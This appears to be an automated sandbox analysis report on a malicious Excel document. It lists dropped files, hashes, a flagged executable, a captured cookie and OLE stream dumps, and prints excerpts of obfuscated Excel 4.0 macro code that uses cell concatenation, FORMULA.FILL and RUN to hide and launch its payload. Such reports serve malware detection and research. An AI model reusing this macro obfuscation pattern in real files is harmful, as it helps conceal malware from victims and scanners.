SHA1:	B32B0BFA6E62EFC6CF9265142A0CC837E73FAE06
SHA-256:	578A9F819A33168A169E9B01383EA68D40B526B1BEB9C16E9C711D75436B73DB
SHA-512:	DD82863199BB14A0F8BFE15E2D25C9362DF62CF3B2D46453FAF2C10FC2B12DE1890031479867E20655896D1F96FD384FA4F80D1605F1A4E2D0EFD96057D20B49
Malicious:	false
Reputation:	low
Preview:	.TKo.0.....0t-l.=.....>.].u?...X.^..6....4k. ^.^l... %rz.r.y.D&.^.w..WA........h(..`..^........:"5...!..CJR.:..D..... .gZ..j......7....s....M.q.O677+..q.'.B4W..E........1.-.a Fk.d.N>{.....Y..`"..uqX.D.z+....r&........u...%..c...8Iq..B...;.*.....9..:<.T.$...?$..Y..s.P.....:..AW2g..I]....O5....zD&.CY.....R^[.O..tLy...WN..n.-.....X.....%:...>.H<>..^..^/.62..lp..zi..]~..^.a.n...mY.../.......PK..........!...<............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C...nH....

C:\Users\user\AppData\Local\Temp\CabCFBF.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 60080 bytes, 1 file
Category:	dropped
Size (bytes):	60080
Entropy (8bit):	7.995256720209506
Encrypted:	true
SSDEEP:	768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
MD5:	6045BACCF49E1EBA0E674945311A06E6
SHA1:	379C6234849EECEDE26FAD192C2EE59E0F0221CB
SHA-256:	65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
SHA-512:	DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wgX......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..\|\|[.w.M.!<-.}%.C<tDX5\s._..I....nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........\|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1\|.._F.

C:\Users\user\AppData\Local\Temp\TarCFC0.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	156885
Entropy (8bit):	6.30972017530066
Encrypted:	false
SSDEEP:	1536:NlR6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMuGmO:N2UJcCyZfdmoku2SL3kMnBGuzO
MD5:	9BE376D85B319264740EF583F548B72A
SHA1:	6C6416CBC51AAC89A21A529695A8FCD3AD5E6B85
SHA-256:	07FDF8BC502E6BB4CF6AE214694F45C54A53228FC2002B2F17C9A2EF64EB76F6
SHA-512:	8AFC5D0D046E8B410EC1D29E2E16FB00CD92F8822D678AA0EE2A57098E05F2A0E165858347F035AE593B62BF195802CB6F9A5F92670041E1828669987CEEC7DE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..d....H.........d.0..d....1.0...`.H.e......0..T...+.....7.....T.0..T.0...+.....7........L.Eu...210519191503Z0...+......0..T.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%....S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 11 05:33:36 2021, atime=Fri Jun 11 05:33:36 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.4783997226177314
Encrypted:	false
SSDEEP:	12:85QvLgXg/XAlCPCHaXgzB8IB/64YvX+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJP9O:85I/XTwz6IzYvYe11CDv3qtrNru/
MD5:	DDDE4AEA52639A376DDEA0363A830989
SHA1:	42C60E4DB7ACC6484B7F49E04B85E1F50B0939C8
SHA-256:	1C26913AC092AFA7B73B276E5BA1C121F6BDC6C67FE1FB4E7DDA837CA5BBDA63
SHA-512:	F5EAED45DEE831251AF7DD6993A01C76336E306D9C58792880C7FD833D36572E45C82516DC1FEA4C993915191D3540778EAAD65209BC0251FC3249423FB8F75A
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G..C.>..^..C.>..^...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R34..Desktop.d......QK.X.R34..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-47-2637.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Fri Jun 11 05:33:36 2021, atime=Fri Jun 11 05:33:36 2021, length=92672, window=hide
Category:	dropped
Size (bytes):	2088
Entropy (8bit):	4.5358356147395575
Encrypted:	false
SSDEEP:	24:8u/7/XTwz6I4U8HMe11n1Dv3qtdM7dD2u/7/XTwz6I4U8HMe11n1Dv3qtdM7dV:8Q/XT3InaMWEtQh2Q/XT3InaMWEtQ/
MD5:	F5F66094ECB1402555729E1107D3C096
SHA1:	38CCFCC00261AFF0B8F487E60F8DB2215979FF9A
SHA-256:	A93527F892D71FDD7A251FEC2150DB068424F7EC190FC4416EC463E90BCE164E
SHA-512:	EE75541A6EC71E5F19138B342773FF6DF87264EDE25F6E5961CAA9BF3EB0B55F28AA75BDFEF20E34BA69D64EEF865AF3541A1A8D01C1237E2765572C319D369F
Malicious:	false
Preview:	L..................F.... ...E....{..C.>..^....C..^...j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..h...R/4 .DOCUME~1.XLS..V.......Q.y.Q.y...8.....................d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\document-47-2637.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9F.C....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.781102818999889
Encrypted:	false
SSDEEP:	3:oyBVomMY9LRkKSd6YCZELRkKSd6YCmMY9LRkKSd6YCv:dj6Y9LaJdzgELaJdzUY9LaJdzs
MD5:	CC574425794FB97F59C2DC249939493A
SHA1:	8CA2DFD4C2535E0FFEB160319D2CD079758B7F8D
SHA-256:	1D977854F9C0DDF7462B6991CA2B6026C4FFCAF52F158A2C7B81B8FBEE5E35F0
SHA-512:	6C9C7CAFA742354DB174653D4C1CF9521AC10C67177FB2E26A85AE1267F1A45094BD1F1AE3C0B53836D5210F6083906F17C26A28A197D0CCF2F76D7447272E43
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..document-47-2637.LNK=0..document-47-2637.LNK=0..[xls]..document-47-2637.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WX9VC4P4.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	99
Entropy (8bit):	4.712733418867265
Encrypted:	false
SSDEEP:	3:12EwDIJJaOXvzSGTKvUQ2VVvWYd6SsUFvWsUTR:8r9gzSGZX/vWYcSsOvTe
MD5:	BD6147C9030F0D655787BE45213DB496
SHA1:	BEEDCBABD678F5969FA7BB2012CB25BB8FCB4CF5
SHA-256:	5CAAF34D2E2E45E1677E131C8C64D202EF39B7D9B235C6E4165DB2EC87E7B4DB
SHA-512:	BC47F84968B6609AE4491B17B5C4FB074795ED6730E93C6A6A0E54CB31AF454123582A1BBCD11265E6D52592A40DE0BDF794A6660D77193E0CAA21BB8735AD5E
Malicious:	false
IE Cache URL:	webhub365.com/
Preview:	PHPSESSID.j12bufirjllllavl516k1pa431.webhub365.com/.1536.2129936640.30891785.3065758319.30891659.*.

C:\Users\user\Desktop\18CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	117436
Entropy (8bit):	7.92560369680784
Encrypted:	false
SSDEEP:	3072:J2KY73qo5oIYZObwnLPdVSudf2azHqMf2azC2KY7A:J2ZouyzWuDzKizC2ZM
MD5:	0A6CFFEA7C8A3F28DB32D6B10FB143FF
SHA1:	D1565F223B143944C30884D301B52AD4E32EE47B
SHA-256:	FD7BDC282938F884B95DDAC7AC1EA44E18DB8664D063962A534FD61B03CC00BC
SHA-512:	C74DA35C7C0179207B9D20027F65524B87DED1063493F3FC87023737180E3B919AA1613E973FB876304BBBC57DA43298234E585CE4B09616D63DD20A70A04601
Malicious:	false
Preview:	........g2........../...........z7.;K/......-..QE<...j..........!...4...k...A.........g2........../.6.........z7.;K/......-..QE<...j..........!...4...k...A.................\.p..........xFU..p..&....Z.(u.E.,..T...eHcPU...r.........j;..=....u7.Oo...0.8D..?.R.&..n}.#a......L..u....n.B.....a.........=....................o......\............=.....9...!- .r.......@........:k".........I............+1...~.. 5A..........b0....V..e..".1.......:1..8&..B..3..esQ.&$..w..-1....,X..>.M2..S..........#R...'.1.....(.z%...`......w.Kt.H..D.hac1.....K..yO.....&q..2k^KQ.#....3.21..rp......R.y$t..5.$K.....i>.VA....LG..g.1....f....[-C'y?....$...iv..:k.1.1......J..i.u..v....n.<......)...1........~.X..&...d...#d.oj..qm.;#1......u.k..DI.NL..O......g....1....?..i..U..m..i..m.d.K)0.f.67z1...-P.f.D....y..tE.BNc.....~.dK.1...&.. %.x]...y..+..2..o....D....1...N....z.@.....+..h...^nQ..F..`1...t.B.....D~.y.?.:.J.-.....".;.1.......N.k.}..P.\..c.C.......1...;....>.cv+Z.$..Xc..n..V*L..;..1...

C:\Users\user\Desktop\D73F0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	modified
Size (bytes):	99731
Entropy (8bit):	7.930414704009687
Encrypted:	false
SSDEEP:	1536:OGEtPTbpH0zoWOYUoFJTU1T8HdYtJEv0W0GEtPTbo:OvXpH0TUo5HdZR0vXo
MD5:	6D8E6965F252B13FF8D880053C83D123
SHA1:	47B7D1032C44D1D914B378F37492E17B0D7A2E59
SHA-256:	67D293F9AC0E32D54F1632FCCC7221DDB84E27D0278A5F403E81BB2A09CAEC0B
SHA-512:	5E485E8DE74B6D1D17C3028A5526ECDC7ED342A6C775FD2C48DBBF914FD034841D7F8DFF3DEE735C401A5B5A1CFA6B4DE2543BE4AF2E2C8EB84DF6C1EB372CD5
Malicious:	false
Preview:	........g2........../.........G....@...Jl......D...)%.......i?....+.\|U0..._........g2........../.6.......G....@...Jl......D...)%.......i?....+.\|U0..._................\.p..w....J.k1...O...6.`.....6.....gR..x.Kpk.Yz..y............V.j.....o.L.\|'.zQ...-..74..T................l.(A...B.....a.........=...K.s......!..........W\|...........3.....=......(.......i)B.P.@.........H."....t................i1......X.+.{.E...#>..;zb.+..(p..`1....d...ngwEm.h.Z#...s.H>.....1...}.oO.^.p~.....;t..OS......nk1....!.A.h..O.F..=...u...q..op...1......xp..K.@!..........%.Df..a1...-.u...[......^...).p..:H..l...i0.j`...1...iY......[.;.OP..p...'......`1....j\|..m.g.e2.1dI5>..pgq"W...:91...RI.@..NI..."......R.....$P..,1.....y.E._...lz.....yq..Y..(.!.1...F.0..M.OH.....{....RF:.\|..u..1...f......%-T3\.F...^.a.o]%{...1...l..IKl....b"EeN.i..Z.G......D1....p.}.Q1E.k..^.J!.h.F%.X...8.1...M[}..@....P...`,.BS...).}_+.1.........cJ>R!.U?.L.=.X!.M...f..1....n-!.../...0.....Q.T.......%1...

C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.584698658834256
Encrypted:	false
SSDEEP:	384:zKIhxI3PKZ/COyNcx5GTyoNr9MUVO9FvB3RH++x5XrIQP8S8cB5vWMiG:zKIhxI3PKZ/bIaqyCrXV+v1NrnLB5X
MD5:	7F7F391491C315A4A72EFCAC0D34FA93
SHA1:	20A18C7EA14F4E1D3044091B46D6E862B6F38708
SHA-256:	022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
SHA-512:	78D39D7FD02D4F6CA0E13D0EACADC842D5A104C31342202875F84A69C310ECF6D4DCC8F00E95B09DE936922BE0312CF956C5E955254A99113EFB3F51E26C082E
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 2%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: document-37-1849.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.]..3..3..3..)..+.3..)..).3..)..>.3..)..%.3..2.V.3..)..9.3..)..+.3..)..+.3.Rich*.3.........PE..L...-.[R.................B...$.......J.......`....@.................................k.....@...... ..........................$q......................................0...............................h!..@............p..$............................text...\|A.......B.................. ..`.data........`.......F..............@....idata..6....p.......H..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 2 14:40:34 2021, Last Saved Time/Date: Wed Jun 2 14:40:36 2021, Security: 1
Entropy (8bit):	7.59086745125602
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	document-47-2637.xls
File size:	92165
MD5:	92dcc47a1a044fc3a2328ec6eef3918b
SHA1:	6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:	ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
SHA512:	fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd
SSDEEP:	1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "document-47-2637.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1252
Author:	Windows User
Last Saved By:	Windows User
Create Time:	2021-06-02 13:40:34
Last Saved Time:	2021-06-02 13:40:36
Creating Application:	Microsoft Excel
Security:	1

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.308022095077
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.316312415339
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	81910
Entropy:	7.97723236264
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65

Macro 4.0 Code

,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $W$367,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($K$351),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $Y$71,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($I$385),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,,,,,,,,,t,,,,,,,,,,,,,,,,,,,,,,,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,q,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 